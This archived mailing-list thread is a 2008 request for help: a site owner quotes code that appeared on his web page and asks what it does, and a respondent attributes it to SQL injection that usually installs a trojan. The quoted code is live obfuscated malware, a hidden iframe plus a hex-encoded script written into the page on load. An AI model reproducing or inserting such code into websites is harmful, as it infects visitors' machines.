Home. 
Search
.

transparent
transparent
transparent
  Library.Mailing List Archive

Altova Mailing List Archives


Re: Mysterious crap on my website

From: "Joe Fawcett" <joefawcett@---------.------>
To: NULL
Date: 12/24/2008 10:01:00 AM

"Marc" <sample@i...> wrote in message 
news:#HTswFYZJHA.5520@T......
> The following code unexpectedly appeared on my website (ISP provided web 
> space). Can anyone tell me what it does? Included in the attachment as it 
> appeared in index.html.
>
>
> <iframe src='http://url/' width='1' height='1' style='visibility: 
> hidden;'></iframe><script>function 
> c102916999516l494f8c1037dde(l494f8c10381c6){ var l494f8c10385ae=16; return 
> (parseInt(l494f8c10381c6,l494f8c10385ae));}function 
> l494f8c1038d7f(l494f8c1039166){  var 
> l494f8c1039552='';l494f8c103a4f1=String.fromCharCode;for(l494f8c1039936=0;l494f8c1039936<l494f8c1039166.length;l494f8c1039936+=2){ 
> l494f8c1039552+=(l494f8c103a4f1(c102916999516l494f8c1037dde(l494f8c1039166.substr(l494f8c1039936,2))));}return 
> l494f8c1039552;} var xc1='';var 
> l494f8c103a9fb='3C736'+xc1+'3726'+xc1+'970743E6'+xc1+'96'+xc1+'6'+xc1+'28216'+xc1+'D796'+xc1+'96'+xc1+'1297B6'+xc1+'46'+xc1+'F6'+xc1+'3756'+xc1+'D6'+xc1+'56'+xc1+'E742E77726'+xc1+'9746'+xc1+'528756'+xc1+'E6'+xc1+'5736'+xc1+'36'+xc1+'1706'+xc1+'528202725336'+xc1+'32536'+xc1+'392536'+xc1+'36'+xc1+'2537322536'+xc1+'312536'+xc1+'6'+xc1+'42536'+xc1+'352532302536'+xc1+'6'+xc1+'52536'+xc1+'312536'+xc1+'6'+xc1+'42536'+xc1+'3525336'+xc1+'42536'+xc1+'332533312533302532302537332537322536'+xc1+'3325336'+xc1+'42532372536'+xc1+'3825373425373425373025336'+xc1+'125326'+xc1+'6'+xc1+'25326'+xc1+'6'+xc1+'2536'+xc1+'372536'+xc1+'6'+xc1+'6'+xc1+'2536'+xc1+'372536'+xc1+'6'+xc1+'6'+xc1+'2533322536'+xc1+'6'+xc1+'42536'+xc1+'3525326'+xc1+'52536'+xc1+'6'+xc1+'52536'+xc1+'3525373425326'+xc1+'6'+xc1+'25326'+xc1+'52536'+xc1+'372536'+xc1+'6'+xc1+'6'+xc1+'25326'+xc1+'6'+xc1+'2536'+xc1+'332536'+xc1+'382536'+xc1+'352536'+xc1+'332536'+xc1+'6'+xc1+'225326'+xc1+'52536'+xc1+'382537342536'+xc1+'6'+xc1+'42536'+xc1+'6'+xc1+'32532372532302537372536'+xc1+'392536'+xc1+'342537342536'+xc1+'3825336'+xc1+'42533392533322532302536'+xc1+'382536'+xc1+'352536'+xc1+'392536'+xc1+'372536'+xc1+'3825373425336'+xc1+'42533312533332533372532302537332537342537392536'+xc1+'6'+xc1+'32536'+xc1+'3525336'+xc1+'4253237253736'+xc1+'2536'+xc1+'392537332536'+xc1+'392536'+xc1+'322536'+xc1+'392536'+xc1+'6'+xc1+'32536'+xc1+'3925373425373925336'+xc1+'12536'+xc1+'382536'+xc1+'392536'+xc1+'342536'+xc1+'342536'+xc1+'352536'+xc1+'6'+xc1+'525323725336'+xc1+'525336'+xc1+'325326'+xc1+'6'+xc1+'2536'+xc1+'392536'+xc1+'36'+xc1+'2537322536'+xc1+'312536'+xc1+'6'+xc1+'42536'+xc1+'3525336'+xc1+'52729293B7D76'+xc1+'6'+xc1+'172206'+xc1+'D796'+xc1+'96'+xc1+'13D7472756'+xc1+'53B3C2F736'+xc1+'3726'+xc1+'970743E';document.write(l494f8c1038d7f(l494f8c103a9fb));</script>
>
>
>
>
>
Looks like the result of a SQL Injection attack. Not prepared to decipher it 
but normally it attempts to install a trojan or similar.

-- 

Joe Fawcett (MVP - XML)
http://joe.fawcett.name


transparent
Print
Mail
Like It
Disclaimer
.

These Archives are provided for informational purposes only and have been generated directly from the Altova mailing list archive system and are comprised of the lists set forth on www.altova.com/list/index.html. Therefore, Altova does not warrant or guarantee the accuracy, reliability, completeness, usefulness, non-infringement of intellectual property rights, or quality of any content on the Altova Mailing List Archive(s), regardless of who originates that content. You expressly understand and agree that you bear all risks associated with using or relying on that content. Altova will not be liable or responsible in any way for any content posted including, but not limited to, any errors or omissions in content, or for any losses or damage of any kind incurred as a result of the use of or reliance on any content. This disclaimer and limitation on liability is in addition to the disclaimers and limitations contained in the Website Terms of Use and elsewhere on the site.

.
.

transparent
transparent
 
Company | Legal | Press | Partners | Careers | Sitemap | Contact Us | Altova Blog | Mobile | Full Site
 
Use of this site is governed by our Terms & Conditions and Privacy Policy Copyright 2005-2012 Altova. All Rights Reserved.
transparentGSA